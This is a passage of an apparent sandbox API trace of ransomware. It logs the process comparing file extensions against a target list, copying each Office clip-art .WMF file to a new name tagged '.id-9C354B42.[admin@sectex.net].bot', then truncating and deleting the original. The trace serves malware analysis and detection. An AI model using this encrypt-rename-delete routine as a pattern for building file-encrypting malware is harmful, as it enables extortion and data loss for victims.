	[0158.742] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0158.742] SetEndOfFile (hFile=0x3d8) returned 1
	[0158.742] CloseHandle (hObject=0x3d8) returned 1
	[0158.742] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.742] SetEndOfFile (hFile=0x1d8) returned 1
	[0158.744] CloseHandle (hObject=0x1d8) returned 1
	[0158.744] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.938] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105368.wmf")) returned 1
	[0158.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF") returned 63
	[0158.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF") returned 63
	[0158.959] lstrlenW (lpString=".doc") returned 4
	[0158.959] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.960] lstrlenW (lpString=".docx") returned 5
	[0158.960] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0158.960] lstrlenW (lpString=".pdf") returned 4
	[0158.960] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.960] lstrlenW (lpString=".xls") returned 4
	[0158.960] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.960] lstrlenW (lpString=".xlsx") returned 5
	[0158.960] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0158.960] lstrlenW (lpString=".ppt") returned 4
	[0158.960] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF") returned 63
	[0158.960] lstrlenW (lpString=".zip") returned 4
	[0158.960] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.960] lstrlenW (lpString=".rar") returned 4
	[0158.960] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.960] lstrlenW (lpString=".bz2") returned 4
	[0158.960] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.960] lstrlenW (lpString=".7z") returned 3
	[0158.960] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF") returned 63
	[0158.960] lstrlenW (lpString=".dbf") returned 4
	[0158.960] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF") returned 63
	[0158.960] lstrlenW (lpString=".1cd") returned 4
	[0158.960] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF") returned 63
	[0158.960] lstrlenW (lpString=".jpg") returned 4
	[0158.960] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.960] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF") returned 63
	[0158.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF") returned 63
	[0158.961] lstrlenW (lpString=".doc") returned 4
	[0158.961] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.961] lstrlenW (lpString=".docx") returned 5
	[0158.961] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0158.961] lstrlenW (lpString=".pdf") returned 4
	[0158.961] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.961] lstrlenW (lpString=".xls") returned 4
	[0158.961] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.961] lstrlenW (lpString=".xlsx") returned 5
	[0158.961] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0158.961] lstrlenW (lpString=".ppt") returned 4
	[0158.961] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF") returned 63
	[0158.961] lstrlenW (lpString=".zip") returned 4
	[0158.961] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.961] lstrlenW (lpString=".rar") returned 4
	[0158.961] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.961] lstrlenW (lpString=".bz2") returned 4
	[0158.961] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.961] lstrlenW (lpString=".7z") returned 3
	[0158.961] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF") returned 63
	[0158.961] lstrlenW (lpString=".dbf") returned 4
	[0158.961] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF") returned 63
	[0158.961] lstrlenW (lpString=".1cd") returned 4
	[0158.961] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF") returned 63
	[0158.962] lstrlenW (lpString=".jpg") returned 4
	[0158.962] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.962] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0158.962] lstrlenW (lpString="J0105398.WMF") returned 12
	[0158.962] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105398.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0158.988] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=3328) returned 1
	[0158.988] CloseHandle (hObject=0x3d0) returned 1
	[0158.988] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105398.wmf")) returned 0x20
	[0159.016] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105398.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105398.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.017] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.017] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.017] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105398.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0159.017] GetLastError () returned 0x0
	[0159.017] ReadFile (in: hFile=0x1b4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xd00, lpOverlapped=0x0) returned 1
	[0159.062] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xd10, lpOverlapped=0x0) returned 1
	[0159.063] ReadFile (in: hFile=0x1b4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.063] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.063] SetEndOfFile (hFile=0x25c) returned 1
	[0159.063] CloseHandle (hObject=0x25c) returned 1
	[0159.063] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.063] SetEndOfFile (hFile=0x1b4) returned 1
	[0159.065] CloseHandle (hObject=0x1b4) returned 1
	[0159.066] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.079] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105398.wmf")) returned 1
	[0159.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF") returned 63
	[0159.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF") returned 63
	[0159.080] lstrlenW (lpString=".doc") returned 4
	[0159.080] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.080] lstrlenW (lpString=".docx") returned 5
	[0159.080] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0159.081] lstrlenW (lpString=".pdf") returned 4
	[0159.081] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.081] lstrlenW (lpString=".xls") returned 4
	[0159.081] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.081] lstrlenW (lpString=".xlsx") returned 5
	[0159.081] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0159.081] lstrlenW (lpString=".ppt") returned 4
	[0159.081] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF") returned 63
	[0159.081] lstrlenW (lpString=".zip") returned 4
	[0159.081] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.081] lstrlenW (lpString=".rar") returned 4
	[0159.081] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.081] lstrlenW (lpString=".bz2") returned 4
	[0159.081] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.081] lstrlenW (lpString=".7z") returned 3
	[0159.081] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF") returned 63
	[0159.081] lstrlenW (lpString=".dbf") returned 4
	[0159.081] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF") returned 63
	[0159.081] lstrlenW (lpString=".1cd") returned 4
	[0159.081] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF") returned 63
	[0159.081] lstrlenW (lpString=".jpg") returned 4
	[0159.081] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF") returned 63
	[0159.081] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF") returned 63
	[0159.081] lstrlenW (lpString=".doc") returned 4
	[0159.082] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.082] lstrlenW (lpString=".docx") returned 5
	[0159.082] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0159.082] lstrlenW (lpString=".pdf") returned 4
	[0159.082] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.082] lstrlenW (lpString=".xls") returned 4
	[0159.082] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.082] lstrlenW (lpString=".xlsx") returned 5
	[0159.082] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0159.082] lstrlenW (lpString=".ppt") returned 4
	[0159.082] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF") returned 63
	[0159.082] lstrlenW (lpString=".zip") returned 4
	[0159.082] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.082] lstrlenW (lpString=".rar") returned 4
	[0159.082] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.082] lstrlenW (lpString=".bz2") returned 4
	[0159.082] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.082] lstrlenW (lpString=".7z") returned 3
	[0159.082] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF") returned 63
	[0159.082] lstrlenW (lpString=".dbf") returned 4
	[0159.082] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF") returned 63
	[0159.082] lstrlenW (lpString=".1cd") returned 4
	[0159.082] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF") returned 63
	[0159.082] lstrlenW (lpString=".jpg") returned 4
	[0159.082] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.083] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.083] lstrlenW (lpString="J0105506.WMF") returned 12
	[0159.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105506.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.083] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2912) returned 1
	[0159.083] CloseHandle (hObject=0x1b4) returned 1
	[0159.083] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105506.wmf")) returned 0x20
	[0159.093] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105506.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105506.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0159.093] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.094] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105506.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0159.094] GetLastError () returned 0x0
	[0159.094] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xb60, lpOverlapped=0x0) returned 1
	[0159.096] WriteFile (in: hFile=0x1d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xb70, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xb70, lpOverlapped=0x0) returned 1
	[0159.097] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.097] WriteFile (in: hFile=0x1d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.097] SetEndOfFile (hFile=0x1d8) returned 1
	[0159.097] CloseHandle (hObject=0x1d8) returned 1
	[0159.097] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.097] SetEndOfFile (hFile=0x388) returned 1
	[0159.099] CloseHandle (hObject=0x388) returned 1
	[0159.099] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.100] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105506.wmf")) returned 1
	[0159.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF") returned 63
	[0159.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF") returned 63
	[0159.100] lstrlenW (lpString=".doc") returned 4
	[0159.100] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.100] lstrlenW (lpString=".docx") returned 5
	[0159.100] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0159.100] lstrlenW (lpString=".pdf") returned 4
	[0159.101] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.101] lstrlenW (lpString=".xls") returned 4
	[0159.101] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.101] lstrlenW (lpString=".xlsx") returned 5
	[0159.101] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0159.101] lstrlenW (lpString=".ppt") returned 4
	[0159.101] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF") returned 63
	[0159.101] lstrlenW (lpString=".zip") returned 4
	[0159.101] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.101] lstrlenW (lpString=".rar") returned 4
	[0159.101] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.101] lstrlenW (lpString=".bz2") returned 4
	[0159.101] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.101] lstrlenW (lpString=".7z") returned 3
	[0159.101] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF") returned 63
	[0159.101] lstrlenW (lpString=".dbf") returned 4
	[0159.101] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF") returned 63
	[0159.101] lstrlenW (lpString=".1cd") returned 4
	[0159.101] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF") returned 63
	[0159.101] lstrlenW (lpString=".jpg") returned 4
	[0159.101] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF") returned 63
	[0159.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF") returned 63
	[0159.101] lstrlenW (lpString=".doc") returned 4
	[0159.101] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.101] lstrlenW (lpString=".docx") returned 5
	[0159.102] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0159.102] lstrlenW (lpString=".pdf") returned 4
	[0159.102] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.102] lstrlenW (lpString=".xls") returned 4
	[0159.102] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.102] lstrlenW (lpString=".xlsx") returned 5
	[0159.102] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0159.102] lstrlenW (lpString=".ppt") returned 4
	[0159.102] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF") returned 63
	[0159.102] lstrlenW (lpString=".zip") returned 4
	[0159.102] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.102] lstrlenW (lpString=".rar") returned 4
	[0159.102] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.102] lstrlenW (lpString=".bz2") returned 4
	[0159.102] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.102] lstrlenW (lpString=".7z") returned 3
	[0159.102] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF") returned 63
	[0159.102] lstrlenW (lpString=".dbf") returned 4
	[0159.102] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF") returned 63
	[0159.102] lstrlenW (lpString=".1cd") returned 4
	[0159.102] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105506.WMF") returned 63
	[0159.102] lstrlenW (lpString=".jpg") returned 4
	[0159.102] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.102] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.103] lstrlenW (lpString="J0105520.WMF") returned 12
	[0159.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105520.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0159.103] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=31812) returned 1
	[0159.103] CloseHandle (hObject=0x388) returned 1
	[0159.103] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105520.wmf")) returned 0x20
	[0159.103] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105520.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105520.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0159.104] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.104] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105520.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0159.105] GetLastError () returned 0x0
	[0159.105] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x7c44, lpOverlapped=0x0) returned 1
	[0159.107] WriteFile (in: hFile=0x1d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x7c50, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x7c50, lpOverlapped=0x0) returned 1
	[0159.109] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.109] WriteFile (in: hFile=0x1d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.109] SetEndOfFile (hFile=0x1d8) returned 1
	[0159.109] CloseHandle (hObject=0x1d8) returned 1
